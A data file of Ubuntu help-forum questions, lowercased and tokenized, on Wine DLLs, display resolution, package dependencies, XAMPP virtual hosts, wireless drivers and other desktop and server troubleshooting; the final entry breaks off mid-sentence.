482033	where can i get fresh new wine dlls ?	i was acting careless today and i accidentally deleted one of the .dlls in my ubuntu wine installation , ~/.wine/drive_c/windows/system32/ole32.dll to be exact , and need a new fresh copy of only this one .dll . i know that reinstalling will fix it , but i have installed quite a few programs and do not want to have to do such a drastic thing just to fix this one problem . so , i 'm wondering if there is somewhere that i can download this original .dll as it came with my original wine installation . i have found the sourceforge repository , but it only has .h and .c files and i do not know how to build them into a .dll . can anyone give me a link to download , or instructions to build my missing .dlls ?
482034	screen resolution after reboot is incorrect	i 've reviewed lots of questions related to this issue and i 'm actually stuck . here 's what i have : 2 monitors set in mirror mode . problem i had was that one of them was not having the 1600x900 resolution . so i find those commands : cvt 1600 900 i took the output and created the following bash script : # ! /bin/bash xrandr -- newmode `` 1600x900_60.00 '' 118.25 1600 1696 1856 2112 900 903 908 934 -hsync +vsync xrandr -- addmode dvi-i-1 1600x900_60.00 xrandr -- output dvi-i-1 -- mode 1600x900_60.00 when i run those command it correctly add the 1600x900 resolution to my dvi-i-1 screen . i see it when i do xrandr . i can set the resolution once its there , and everything is fine . probleme is , when i reboot . i tried to add that script as a startup application , but it did not help . after i log in , there 's an error saying that the resolution is wrong in the configuration . i close that error message , and the 1600x900 resolution is there , i then have to open the settings - > display settings and reset both monitor as mirror and set both at 1600x900 . is there a way to make this work without manually having to reset the resolution each time i log in ? any help appreciated , thanks
482036	how to access hbase after juju	i have used the hbase charm with juju to successfully deploy hbase , however i no idea how to access the instance of hbase now ! normally i would use the shell provided in the ../hbase/bin/ directory but i can not find it . any idea how i can access hbase to insert data at this point ? thanks !
482038	setting up themes in lx-qt	i recently installed lx-qt on ubuntu server . everything went fine , but there seems to be an issue with the themes . when a theme is set in `` qt configuration '' ( currently `` qtcurve '' ) , it does n't change the theme of the windows . as i understand it , the windows are openbox . is this correct ? i went in to the openbox settings to try to set the theme there but that same theme is n't listed there . is there a way to use the `` qtcurve '' theme for the windows ?
482041	ubuntu 14.04 64 bit - unmet dependencies ( skype , steam , samba )	i ca n't install many different kinds of packages on my ubuntu 14.04 64bit system . i have run the command sudo dpkg -- add-architecture i386 as many of the related questions have suggested , but when i run sudo apt-get install skype i get : reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : skype : depends : skype-bin e : unable to correct problems , you have held broken packages . steam fails too : reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : steam : i386 : depends : libgl1-mesa-dri : i386 but it is not going to be installed depends : libgl1-mesa-glx : i386 but it is not going to be installed e : unable to correct problems , you have held broken packages . also , even something i thought was simple like samba fails to install : reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : samba : depends : samba-common ( = 2:4.1.6+dfsg-1ubuntu2 ) but 2:4.1.6+dfsg-1ubuntu2.14.04.1 is to be installed depends : samba-common-bin ( = 2:4.1.6+dfsg-1ubuntu2 ) but 2:4.1.6+dfsg-1ubuntu2.14.04.1 is to be installed depends : samba-dsdb-modules but it is not going to be installed depends : samba-libs ( = 2:4.1.6+dfsg-1ubuntu2 ) but 2:4.1.6+dfsg-1ubuntu2.14.04.1 is to be installed recommends : attr recommends : samba-vfs-modules but it is not going to be installed e : unable to correct problems , you have held broken packages . here are the uncommented lines from /etc/apt/sources.list : deb http : //archive.ubuntu.com/ubuntu trusty main restricted deb-src http : //archive.ubuntu.com/ubuntu trusty main restricted deb http : //archive.ubuntu.com/ubuntu trusty universe deb-src http : //archive.ubuntu.com/ubuntu trusty universe deb http : //archive.ubuntu.com/ubuntu trusty multiverse deb-src http : //archive.ubuntu.com/ubuntu trusty multiverse deb http : //archive.canonical.com/ trusty partner deb http : //extras.ubuntu.com/ubuntu trusty main deb-src http : //extras.ubuntu.com/ubuntu trusty main i believe this has something to do with the `` new '' ( ? ) multiarch system in ubuntu 14.04 ( my last system ran 13.04 ) , but i do n't really know what to do to fix this problem . i have seen many suggests that involve crowbaring packages from older distributions into 14.04 , but i do n't want to do that unless as a last resort . the only ppa i have installed is the one for google chrome . how do i fix this ?
482045	folder permissions for new partition - ca n't move files	i 'm using ubuntu 14.04 . i used the install cd to repartition my hd by resizing /dev/sda1 and creating /dev/sda3 as a primary partition . i named it `` media '' . when i reboot from hd , when i try to move files from the home directory to the new partition , i get an error message `` error while copying . the folder âtvâ can not be copied because you do not have permissions to create it in the destination . '' the new partition shows up in gparted as locked , with mount point /media/ian/media and label media . i want to move my media files from the boot partition to a separate partition . any advice ?
482049	followup question : how to get fix for trackpad bug from 3.15 kernel ?	this is a followup question to touchpad not recognized on new ultrabook in that question , asker had trouble with the trackpad not working on samsung ativ book 9 2014 edition ( np930x5j/np940x5j ) with ubuntu 14.04 lts . ( i am having the same exact issue . ) the accepted answer said that it is a kernel bug and that the final version of 3.15 kernel will contain the fix . the answerer linked to kernel bug report https : //patchwork.kernel.org/patch/4096321/ i read news that the stable 3.15 kernel was released a few days ago on 8-jun-2014 . i am hopeful that it has the fix for this issue ! question 1 : does the stable 3.15 kernel indeed contain the fix ( kernel patch 4096321 ) ? question 2 : what is the next ubuntu release that will contain this kernel ( and hence contain the fix that i need ) ? question 3 : if i ca n't bear to wait until the next ubuntu release , then what is the next ubuntu test kernel ( i 'm assuming from kernel.ubuntu.com/~kernel-ppa/mainline/ ? c=n ; o=d but correct me if i 'm wrong ) that would have the fix ? question 4 : if i want to install the test kernel that is the answer to question 3 , can i do that safely without leaving 14.04 lts ? i really want to stay on an lts version of ubuntu . i 'm not looking to upgrade ubuntu every 6 months . i just want to make my trackpad work and then not make any further changes to my system for a few years ( except automated updates , of course ) . thanks in advance ! ps . i 'm new to linux/ubuntu so forgive me if some of my questions are badly asked . update : thanks for the answers . i finally upgraded the kernel to one of the stable 3.15 versions from here ( delay was mostly due to me being afraid of the unknown , particularly of breaking my computer ) . i 'm half-happy to report that the touchpad now half-works . specifically , it works after computer startup , but stops working after suspend+resume .
482058	ibm r30 trident cyberblade aladdin i1 video adapter in ubuntu 14.04	as a demonstration of just how good ubuntu is , i am attempting to install the latest release 14.04 on the oldest laptop i have , an ibm r30 thinkpad . with 1ghz piii cpu and 1 gb memory it should work ok . if i can get it to work , i want to use it to convince local community groups and businesses to migrate to ubuntu and not upgrade their hardware to satisfy the windows xp end of support franchise . i have installed 14.04 but get a message saying the video and input settings could not be detected . trying to use minimal video settings does not work , though i can get to a terminal , albeit with huge funky fonts . i know the trident cyberblade aladdin i1 video adapter is likely a problem , but according to thinkwiki , `` this chip is supported by the 'trident ' driver as part of the x.org distribution '' , and `` display on the internal lcd works as long as you set the monitor settings correct. '' . ok , so now i need a bit of help as to where to go next . do i start by editing xorg.conf files ? your help would be most appreciated . if i can get this idea working i think i will be able to bring lots of new organisations into the open source universe .
482061	settings reset to default every time i reboot	every time i log in or reboot my system , the ubuntu settings reset to what they were when i first installed the system . for example , the icons on the left-side launcher change to libretext , firefox , amazon , etc ... the icons that were there when first booted from an install cd . my display settings change to something unbearable that i have to change every time i log in . can anybody offer any help ? i tried this but it was n't good . thanks a bunch , michael
482064	ccsm not saving any changes made	i 'm making changes with ccsm to the unity plugin , mainly to disable a whole ton of useless keyboard shortcuts which just take fullscreen applications out of focus and cause other problems . the changes however , are all being undone every reboot and when i run ccsm again , all the changes are showing as there , but all the shortcuts become re-enabled . i then have to restore each one to default again , and re-disable it , only to have it happen on the next reboot . how do i get it to save the changes and actually , save the changes instead of just showing them saved ?
482065	hp officejet printer wo n't print libreoffice documents	my hp officejet pro 8600 wo n't print any documents from libreoffice . if i print a trial page from the internet , it prints perfectly fine although it does n't print the documents themselves . i 've tried to reconnect it to the internet and rebooting my computer . every time i try to print a document it says it 's pending and it wo n't release the document .
482068	virtual host is not working in ubuntu 14 vps using xampp 1.8.3	i am using xampp as server in ubuntu 14.04 vps of digitalocean . i tried to setup virtual hosts . but it is not working and i am getting 403 error of access denied . i changed files too . my files with changes are /opt/lampp/etc/httpd.conf # # this is the main apache http server configuration file . it contains the # configuration directives that give the server its instructions . # see < url : http : //httpd.apache.org/docs/trunk/ > for detailed information . # in particular , see # < url : http : //httpd.apache.org/docs/trunk/mod/directives.html > # for a discussion of each configuration directive . # # do not simply read the instructions in here without understanding # what they do . they 're here only as hints or reminders . if you are unsure # consult the online docs . you have been warned . # # configuration and logfile names : if the filenames you specify for many # of the server 's control files begin with `` / '' ( or `` drive : / '' for win32 ) , the # server will use that explicit path . if the filenames do *not* begin # with `` / '' , the value of serverroot is prepended -- so 'log/access_log' # with serverroot set to '/www ' will be interpreted by the # server as '/www/log/access_log ' , where as '/log/access_log ' will be # interpreted as '/log/access_log ' . # # serverroot : the top of the directory tree under which the server's # configuration , error , and log files are kept . # # do not add a slash at the end of the directory path . if you point # serverroot at a non-local disk , be sure to specify a local disk on the # mutex directive , if file-based mutexes are used . if you wish to share the # same serverroot for multiple httpd daemons , you will need to change at # least pidfile . # serverroot `` /opt/lampp '' # # mutex : allows you to set the mutex mechanism and mutex file directory # for individual mutexes , or change the global defaults # # uncomment and change the directory if mutexes are file-based and the default # mutex file directory is not on a local disk or is not appropriate for some # other reason . # # mutex default : logs # # listen : allows you to bind apache to specific ip addresses and/or # ports , instead of the default . see also the < virtualhost > # directive . # # change this to listen on specific ip addresses as shown below to # prevent apache from glomming onto all bound ip addresses . # # listen 12.34.56.78:80 listen 80 # # dynamic shared object ( dso ) support # # to be able to use the functionality of a module which was built as a dso you # have to place corresponding `loadmodule ' lines at this location so the # directives contained in it are actually available _before_ they are used . # statically compiled modules ( those listed by `httpd -l ' ) do not need # to be loaded here . # # example : # loadmodule foo_module modules/mod_foo.so # loadmodule authn_file_module modules/mod_authn_file.so loadmodule authn_dbm_module modules/mod_authn_dbm.so loadmodule authn_anon_module modules/mod_authn_anon.so loadmodule authn_dbd_module modules/mod_authn_dbd.so loadmodule authn_socache_module modules/mod_authn_socache.so loadmodule authn_core_module modules/mod_authn_core.so loadmodule authz_host_module modules/mod_authz_host.so loadmodule authz_groupfile_module modules/mod_authz_groupfile.so loadmodule authz_user_module modules/mod_authz_user.so loadmodule authz_dbm_module modules/mod_authz_dbm.so loadmodule authz_owner_module modules/mod_authz_owner.so loadmodule authz_dbd_module modules/mod_authz_dbd.so loadmodule authz_core_module modules/mod_authz_core.so loadmodule authnz_ldap_module modules/mod_authnz_ldap.so loadmodule access_compat_module modules/mod_access_compat.so loadmodule auth_basic_module modules/mod_auth_basic.so loadmodule auth_form_module modules/mod_auth_form.so loadmodule auth_digest_module modules/mod_auth_digest.so loadmodule allowmethods_module modules/mod_allowmethods.so loadmodule file_cache_module modules/mod_file_cache.so loadmodule cache_module modules/mod_cache.so loadmodule cache_disk_module modules/mod_cache_disk.so loadmodule socache_shmcb_module modules/mod_socache_shmcb.so loadmodule socache_dbm_module modules/mod_socache_dbm.so loadmodule socache_memcache_module modules/mod_socache_memcache.so loadmodule dbd_module modules/mod_dbd.so loadmodule bucketeer_module modules/mod_bucketeer.so loadmodule dumpio_module modules/mod_dumpio.so loadmodule echo_module modules/mod_echo.so loadmodule case_filter_module modules/mod_case_filter.so loadmodule case_filter_in_module modules/mod_case_filter_in.so loadmodule buffer_module modules/mod_buffer.so loadmodule ratelimit_module modules/mod_ratelimit.so loadmodule reqtimeout_module modules/mod_reqtimeout.so loadmodule ext_filter_module modules/mod_ext_filter.so loadmodule request_module modules/mod_request.so loadmodule include_module modules/mod_include.so loadmodule filter_module modules/mod_filter.so loadmodule substitute_module modules/mod_substitute.so loadmodule sed_module modules/mod_sed.so loadmodule charset_lite_module modules/mod_charset_lite.so loadmodule deflate_module modules/mod_deflate.so loadmodule mime_module modules/mod_mime.so loadmodule ldap_module modules/mod_ldap.so loadmodule log_config_module modules/mod_log_config.so loadmodule log_debug_module modules/mod_log_debug.so loadmodule logio_module modules/mod_logio.so loadmodule env_module modules/mod_env.so loadmodule mime_magic_module modules/mod_mime_magic.so loadmodule cern_meta_module modules/mod_cern_meta.so loadmodule expires_module modules/mod_expires.so loadmodule headers_module modules/mod_headers.so loadmodule usertrack_module modules/mod_usertrack.so loadmodule unique_id_module modules/mod_unique_id.so loadmodule setenvif_module modules/mod_setenvif.so loadmodule version_module modules/mod_version.so loadmodule remoteip_module modules/mod_remoteip.so loadmodule proxy_module modules/mod_proxy.so loadmodule proxy_connect_module modules/mod_proxy_connect.so loadmodule proxy_ftp_module modules/mod_proxy_ftp.so loadmodule proxy_http_module modules/mod_proxy_http.so loadmodule proxy_fcgi_module modules/mod_proxy_fcgi.so loadmodule proxy_scgi_module modules/mod_proxy_scgi.so loadmodule proxy_ajp_module modules/mod_proxy_ajp.so loadmodule proxy_balancer_module modules/mod_proxy_balancer.so loadmodule proxy_express_module modules/mod_proxy_express.so loadmodule session_module modules/mod_session.so loadmodule session_cookie_module modules/mod_session_cookie.so loadmodule session_dbd_module modules/mod_session_dbd.so loadmodule slotmem_shm_module modules/mod_slotmem_shm.so loadmodule ssl_module modules/mod_ssl.so loadmodule lbmethod_byrequests_module modules/mod_lbmethod_byrequests.so loadmodule lbmethod_bytraffic_module modules/mod_lbmethod_bytraffic.so loadmodule lbmethod_bybusyness_module modules/mod_lbmethod_bybusyness.so loadmodule lbmethod_heartbeat_module modules/mod_lbmethod_heartbeat.so loadmodule unixd_module modules/mod_unixd.so loadmodule dav_module modules/mod_dav.so loadmodule status_module modules/mod_status.so loadmodule autoindex_module modules/mod_autoindex.so loadmodule info_module modules/mod_info.so loadmodule suexec_module modules/mod_suexec.so loadmodule cgi_module modules/mod_cgi.so loadmodule cgid_module modules/mod_cgid.so loadmodule dav_fs_module modules/mod_dav_fs.so loadmodule vhost_alias_module modules/mod_vhost_alias.so loadmodule negotiation_module modules/mod_negotiation.so loadmodule dir_module modules/mod_dir.so loadmodule actions_module modules/mod_actions.so loadmodule speling_module modules/mod_speling.so loadmodule userdir_module modules/mod_userdir.so loadmodule alias_module modules/mod_alias.so loadmodule rewrite_module modules/mod_rewrite.so < ifdefine justtomakeapxshappy > loadmodule php4_module modules/libphp4.so loadmodule php5_module modules/libphp5.so < /ifdefine > < ifmodule unixd_module > # # if you wish httpd to run as a different user or group , you must run # httpd as root initially and it will switch . # # user/group : the name ( or # number ) of the user/group to run httpd as . # it is usually good practice to create a dedicated user and group for # running httpd , as with most system services . # user root group www < /ifmodule > # 'main ' server configuration # # the directives in this section set up the values used by the 'main' # server , which responds to any requests that are n't handled by a # < virtualhost > definition . these values also provide defaults for # any < virtualhost > containers you may define later in the file . # # all of these directives may appear inside < virtualhost > containers , # in which case these default settings will be overridden for the # virtual host being defined . # # # serveradmin : your address , where problems with the server should be # e-mailed . this address appears on some server-generated pages , such # as error documents . e.g . admin @ your-domain.com # serveradmin you @ example.com # # servername gives the name and port that the server uses to identify itself . # this can often be determined automatically , but we recommend you specify # it explicitly to prevent problems during startup . # # if your host does n't have a registered dns name , enter its ip address here . # # servername www.example.com : @ @ port @ @ # xampp servername localhost # # deny access to the entirety of your server 's filesystem . you must # explicitly permit access to web content directories in other # < directory > blocks below . # < directory / > allowoverride none require all denied < /directory > # # note that from this point forward you must specifically allow # particular features to be enabled - so if something 's not working as # you might expect , make sure that you have specifically enabled it # below . # # # documentroot : the directory out of which you will serve your # documents . by default , all requests are taken from this directory , but # symbolic links and aliases may be used to point to other locations . # documentroot `` /opt/lampp/htdocs '' < directory `` /opt/lampp/htdocs '' > # # possible values for the options directive are `` none '' , `` all '' , # or any combination of : # indexes includes followsymlinks symlinksifownermatch execcgi multiviews # # note that `` multiviews '' must be named *explicitly* -- - `` options all '' # does n't give it to you . # # the options directive is both complicated and important . please see # http : //httpd.apache.org/docs/trunk/mod/core.html # options # for more information . # # options indexes followsymlinks # xampp options indexes followsymlinks execcgi includes # # allowoverride controls what directives may be placed in .htaccess files . # it can be `` all '' , `` none '' , or any combination of the keywords : # options fileinfo authconfig limit # # allowoverride none # since xampp 1.4 : allowoverride all # # controls who can get stuff from this server . # require all granted < /directory > # # directoryindex : sets the file that apache will serve if a directory # is requested . # < ifmodule dir_module > # directoryindex index.html # xampp directoryindex index.html index.html.var index.php index.php3 index.php4 < /ifmodule > # # the following lines prevent .htaccess and .htpasswd files from being # viewed by web clients . # < files `` .ht* '' > require all denied < /files > # # errorlog : the location of the error log file . # if you do not specify an errorlog directive within a < virtualhost > # container , error messages relating to that virtual host will be # logged here . if you *do* define an error logfile for a < virtualhost > # container , that host 's errors will be logged there and not here . # errorlog `` logs/error_log '' # # loglevel : control the number of messages logged to the error_log . # possible values include : debug , info , notice , warn , error , crit , # alert , emerg . # loglevel warn < ifmodule log_config_module > # # the following directives define some format nicknames for use with # a customlog directive ( see below ) . # logformat `` % h % l % u % t \ '' % r\ '' % > s % b \ '' % { referer } i\ '' \ '' % { user-agent } i\ '' '' combined logformat `` % h % l % u % t \ '' % r\ '' % > s % b '' common < ifmodule logio_module > # you need to enable mod_logio.c to use % i and % o logformat `` % h % l % u % t \ '' % r\ '' % > s % b \ '' % { referer } i\ '' \ '' % { user-agent } i\ '' % i % o '' combinedio < /ifmodule > # # the location and format of the access logfile ( common logfile format ) . # if you do not define any access logfiles within a < virtualhost > # container , they will be logged here . contrariwise , if you *do* # define per- < virtualhost > access logfiles , transactions will be # logged therein and *not* in this file . # customlog `` logs/access_log '' common # # if you prefer a logfile with access , agent , and referer information # ( combined logfile format ) you can use the following directive . # # customlog `` logs/access_log '' combined < /ifmodule > < ifmodule alias_module > # # redirect : allows you to tell clients about documents that used to # exist in your server 's namespace , but do not anymore . the client # will make a new request for the document at its new location . # example : # redirect permanent /foo http : //www.example.com/bar # # alias : maps web paths into filesystem paths and is used to # access content that does not live under the documentroot . # example : # alias /webpath /full/filesystem/path # # if you include a trailing / on /webpath then the server will # require it to be present in the url . you will also likely # need to provide a < directory > section to allow access to # the filesystem path . # # scriptalias : this controls which directories contain server scripts . # scriptaliases are essentially the same as aliases , except that # documents in the target directory are treated as applications and # run by the server when requested rather than as documents sent to the # client . the same rules about trailing `` / '' apply to scriptalias # directives as to alias . # scriptalias /cgi-bin/ `` /opt/lampp/cgi-bin/ '' < /ifmodule > < ifmodule cgid_module > # # scriptsock : on threaded servers , designate the path to the unix # socket used to communicate with the cgi daemon of mod_cgid . # # scriptsock logs/cgisock < /ifmodule > # # `` /opt/lampp/cgi-bin '' should be changed to whatever your scriptaliased # cgi directory exists , if you have that configured . # < directory `` /opt/lampp/cgi-bin '' > allowoverride none options none require all granted < /directory > < ifmodule mime_module > # # typesconfig points to the file containing the list of mappings from # filename extension to mime-type . # typesconfig etc/mime.types # # addtype allows you to add to or override the mime configuration # file specified in typesconfig for specific file types . # # addtype application/x-gzip .tgz # # addencoding allows you to have certain browsers uncompress # information on the fly . note : not all browsers support this . # # addencoding x-compress .z # addencoding x-gzip .gz .tgz # # if the addencoding directives above are commented-out , then you # probably should define those extensions to indicate media types : # addtype application/x-compress .z addtype application/x-gzip .gz .tgz # # addhandler allows you to map certain file extensions to `` handlers '' : # actions unrelated to filetype . these can be either built into the server # or added with the action directive ( see below ) # # to use cgi scripts outside of scriptaliased directories : # ( you will also need to add `` execcgi '' to the `` options '' directive . ) # # addhandler cgi-script .cgi # xampp , since lampp 0.9.8 : addhandler cgi-script .cgi .pl # for type maps ( negotiated resources ) : # addhandler type-map var # # filters allow you to process content before it is sent to the client . # # to parse .shtml files for server-side includes ( ssi ) : # ( you will also need to add `` includes '' to the `` options '' directive . ) # # xampp addtype text/html .shtml addoutputfilter includes .shtml < /ifmodule > # # the mod_mime_magic module allows the server to use various hints from the # contents of the file itself to determine its type . the mimemagicfile # directive tells the module where the hint definitions are located . # # mimemagicfile etc/magic # # customizable error responses come in three flavors : # 1 ) plain text 2 ) local redirects 3 ) external redirects # # some examples : # errordocument 500 `` the server made a boo boo . '' # errordocument 404 /missing.html # errordocument 404 `` /cgi-bin/missing_handler.pl '' # errordocument 402 http : //www.example.com/subscription_info.html # # # maxranges : maximum number of ranges in a request before # returning the entire resource , or one of the special # values 'default ' , 'none ' or 'unlimited ' . # default setting is to accept 200 ranges . # maxranges unlimited # # enablemmap and enablesendfile : on systems that support it , # memory-mapping or the sendfile syscall may be used to deliver # files . this usually improves server performance , but must # be turned off when serving from networked-mounted # filesystems or if support for these functions is otherwise # broken on your system . # defaults : enablemmap on , enablesendfile off # enablemmap off enablesendfile off # supplemental configuration # # the configuration files in the etc/extra/ directory can be # included to add extra features or to modify the default configuration of # the server , or you may simply copy their contents here and change as # necessary . # server-pool management ( mpm specific ) # include etc/extra/httpd-mpm.conf # multi-language error messages include etc/extra/httpd-multilang-errordoc.conf # fancy directory listings include etc/extra/httpd-autoindex.conf # language settings # include etc/extra/httpd-languages.conf # user home directories # include etc/extra/httpd-userdir.conf # real-time info on requests and configuration # include etc/extra/httpd-info.conf # virtual hosts include etc/extra/httpd-vhosts.conf # local access to the apache http server manual # include etc/extra/httpd-manual.conf # distributed authoring and versioning ( webdav ) # include etc/extra/httpd-dav.conf # various default settings include etc/extra/httpd-default.conf # configure mod_proxy_html to understand html4/xhtml1 < ifmodule proxy_html_module > include etc/extra/proxy-html.conf < /ifmodule > # secure ( ssl/tls ) connections < ifmodule ssl_module > # xampp < ifdefine ssl > include etc/extra/httpd-ssl.conf < /ifdefine > < /ifmodule > # # note : the following must must be present to support # starting without ssl on platforms with no /dev/random equivalent # but a statically compiled-in mod_ssl . # < ifmodule ssl_module > sslrandomseed startup builtin sslrandomseed connect builtin < /ifmodule > # xampp include etc/extra/httpd-xampp.conf include `` /opt/lampp/apache2/conf/httpd.conf '' i used command shown in this example . i used below lines to change and add group add group `` groupadd www '' add user to group `` usermod -ag www root '' change htdocs group `` chgrp -r www /opt/lampp/htdocs '' change sitedir group `` chgrp -r www /opt/lampp/htdocs/mysite '' change htdocs chmod `` chmod 2775 /opt/lampp/htdocs '' change sitedir chmod `` chmod 2775 /opt/lampp/htdocs/mysite '' and then i changed my vhosts.conf file # virtual hosts # # required modules : mod_log_config # if you want to maintain multiple domains/hostnames on your # machine you can setup virtualhost containers for them . most configurations # use only name-based virtual hosts so the server does n't need to worry about # ip addresses . this is indicated by the asterisks in the directives below . # # please see the documentation at # < url : http : //httpd.apache.org/docs/2.4/vhosts/ > # for further details before you try to setup virtual hosts . # # you may use the command line option '-s ' to verify your virtual host # configuration . # # virtualhost example : # almost any apache directive may go into a virtualhost container . # the first virtualhost section is used for all requests that do not # match a servername or serveralias in any < virtualhost > block . # < virtualhost *:80 > serveradmin webmaster @ dummy-host.example.com documentroot `` /opt/lampp/docs/dummy-host.example.com '' servername dummy-host.example.com serveralias www.dummy-host.example.com errorlog `` logs/dummy-host.example.com-error_log '' customlog `` logs/dummy-host.example.com-access_log '' common < /virtualhost > < virtualhost *:80 > serveradmin webmaster @ dummy-host2.example.com documentroot `` /opt/lampp/docs/dummy-host2.example.com '' servername dummy-host2.example.com errorlog `` logs/dummy-host2.example.com-error_log '' customlog `` logs/dummy-host2.example.com-access_log '' common < /virtualhost > namevirtualhost * < virtualhost * > serveradmin support @ mysite.com documentroot `` /opt/lampp/htdocs/mysite '' servername mysite.com serveralias mysite.com errorlog `` /opt/lampp/htdocs/mysite/errorlogs '' customlog `` /opt/lampp/htdocs/mysite/customlog '' common < directory `` /opt/lampp/htdocs/mysite '' > options indexes followsymlinks includes execcgi allowoverride all order allow , deny allow from all require all granted < /directory > < /virtualhost > but still its not working and i am getting 403 error on my ip and domain however i can access phpmyadmin . if anyone can help me , please help me .
482069	terminal exits program before able to accept hashcat eula	i 'm trying to play around with hashcat , just using the examples included with the program , but before the command can run it requires me to accept the eula . instead of me being able to enter 'yes ' , the terminal appears to end the process immediately . whenever i try to accept the eula i get the expected 'yes : command not found . ' i do n't think i 'm using the command wrong , but i also do n't know whats happening . http : //i.imgur.com/clloek6.png
482071	getting adb to run	i 've recently installed ubuntu and i need android sdk ( and subsequently , adb ) in order to develop my apps to college . the fact is that , no matter what i do , i ca n't get adb to work . exporting its place to the path did n't worked . i only get `` file or directory not found '' error while this are the contents of the path variable : renan @ rocketqueen : ~ $ echo $ path /usr/local/sbin : /usr/local/bin : /usr/sbin : /usr/bin : /sbin : /bin : /usr/games : /usr/local/games : /home/renan/adt/sdk/tools : /home/renan/adt/sdk/platform-tools i do n't want to install android-tools-adb/fastboot because they 're outdate when compared to sdk manager ones . what do i need to do in order for it to work from anywhere when called from terminal ?
482072	difficulty in partitioning after installation	i have installed ubuntu12 . while installing i have n't created any partition . i am trying to create one now , but it not allowing me to do that , saying , 'the device is busy ' . please help .
482074	will ubuntu live cd move mft to resize ntfs volumes ?	i have a feeling some will consider this a duplicate , but please hear me out . i 've been reading tons of questions and threads around this but have never really found an answer for this specifically . i want to shrink my ntfs partition to make room for a ubuntu install , so i can dual boot them . however when shrinking the ntfs volume in windows disk management , it will only go so far as the mft is sitting near the end of the volume . i 've read plenty of posts about why it does this , and how difficult/dangerous it is to move the mft etc . i 've also read that perfect disk can apparently do it under it 's trial period , but i remain cautious to try this method . i was wondering however if the disk partitioning utility included in the ubuntu install wizard handles the moving of the mft when dragging the partition boundaries . it all seems too simple that you simply tell it the new size you want it to be . would it tell me if it could n't resize by the amount you requested if the mft was an issue , or move it for you if it were able . i 'm concerned it might corrupt the mft and the volume , even though i doubt the install wizard would be so daft . so what exactly is the deal with the partition resizing tool in the ubuntu install wizard ? will it safely resize my ntfs volume despite the location of my mft ? thanks in advance .
482075	wireless problem with broadcom bcm4313	i have wireless connection problem ca n't connect my wireless lspci -vvnn | grep 14e4 03:00.0 network controller [ 0280 ] : broadcom corporation bcm4313 802.11bgn wireless network adapter [ 14e4:4727 ] ( rev 01 ) iwconfig eth0 no wireless extensions . lo no wireless extensions . wlan0 ieee 802.11abg essid : off/any mode : managed access point : not-associated retry long limit:7 rts thr : off fragment thr : off power management : off rfkill list all 0 : hci0 : bluetooth soft blocked : no hard blocked : no 1 : phy0 : wireless lan soft blocked : no hard blocked : no 2 : brcmwl-0 : wireless lan soft blocked : no hard blocked : no lsmod module size used by bnep 19624 2 rfcomm 69160 8 ip6t_reject 12939 1 xt_hl 12521 6 ip6t_rt 13537 3 nf_conntrack_ipv6 18894 8 nf_defrag_ipv6 34768 1 nf_conntrack_ipv6 ipt_reject 12541 1 xt_log 17717 10 xt_limit 12711 13 xt_tcpudp 12884 18 xt_addrtype 12635 4 nf_conntrack_ipv4 15012 8 nf_defrag_ipv4 12758 1 nf_conntrack_ipv4 xt_conntrack 12760 16 ip6table_filter 12815 1 ip6_tables 27025 1 ip6table_filter nf_conntrack_netbios_ns 12665 0 nf_conntrack_broadcast 12589 1 nf_conntrack_netbios_ns nf_nat_ftp 12770 0 nf_nat 21798 1 nf_nat_ftp nf_conntrack_ftp 18638 1 nf_nat_ftp nf_conntrack 96976 8 > nf_nat_ftp , nf_conntrack_netbios_ns , nf_nat , xt_conntrack , nf_conntrack_broadcast , nf_conntrack_ftp , nf_conntrack_ipv4 , nf_conntrack_ipv6 iptable_filter 12810 1 ip_tables 27239 1 iptable_filter vx_tables 34059 13 > ip6table_filter , xt_hl , ip_tables , xt_tcpudp , xt_limit , xt_conntrack , xt_log , iptable_filter , ip > 6t_rt , ipt_reject , ip6_tables , xt_addrtype , ip6t_reject uvcvideo 80885 0 videobuf2_vmalloc 13216 1 uvcvideo videobuf2_memops 13362 1 videobuf2_vmalloc snd_hda_codec_hdmi 46207 1 videobuf2_core 40664 1 uvcvideo videodev 134688 2 uvcvideo , videobuf2_core snd_hda_codec_conexant 57441 1 snd_hda_intel 52355 8 snd_hda_codec 192906 3 snd_hda_codec_hdmi , snd_hda_codec_conexant , snd_hda_intel snd_hwdep 13602 1 snd_hda_codec snd_pcm 102099 4 snd_hda_codec_hdmi , snd_hda_codec , snd_hda_intel snd_page_alloc 18710 2 snd_pcm , snd_hda_intel snd_seq_midi 13324 0 dm_multipath 22873 0 snd_seq_midi_event 14899 1 snd_seq_midi scsi_dh 14882 1 dm_multipath lib80211_crypt_tkip 17619 0 snd_rawmidi 30144 1 snd_seq_midi intel_powerclamp 14705 0 coretemp 13435 0 kvm_intel 143060 0 kvm 451511 1 kvm_intel joydev 17381 0 serio_raw 13462 0 snd_seq 61560 2 snd_seq_midi_event , snd_seq_midi intel_ips 18664 0 wl 4207846 0 snd_seq_device 14497 3 snd_seq , snd_rawmidi , snd_seq_midi btusb 32412 0 bluetooth 395423 22 bnep , btusb , rfcomm snd_timer 29482 2 snd_pcm , snd_seq snd 69238 26 > snd_hwdep , snd_timer , snd_hda_codec_hdmi , snd_hda_codec_conexant , snd_pcm , snd_seq , snd_rawmidi , snd_hda_codec , snd_hda_intel , snd_seq_device , snd_seq_midi lib80211 14381 2 wl , lib80211_crypt_tkip toshiba_bluetooth 12852 0 cfg80211 484040 1 wl > lpc_ich 21080 0 fglrx 8085343 190 soundcore 12680 1 snd toshiba_acpi 22901 0 sparse_keymap 13948 1 toshiba_acpi wmi 19177 1 toshiba_acpi amd_iommu_v2 19054 1 fglrx video 19476 0 mei_me 18627 0 mei 82276 1 mei_me mac_hid 13205 0 parport_pc 32701 0 ppdev 17671 0 lp 17759 0 parport 42348 3 lp , ppdev , parport_pc hid_generic 12548 0 usbhid 52570 0 hid 106148 2 hid_generic , usbhid psmouse 102222 0 ahci 25819 3 libahci 32168 1 ahci atl1c 46086 0 dm_mirror 22135 0 dm_region_hash 20862 1 dm_mirror dm_log 18411 2 dm_region_hash , dm_mirror can someone give any 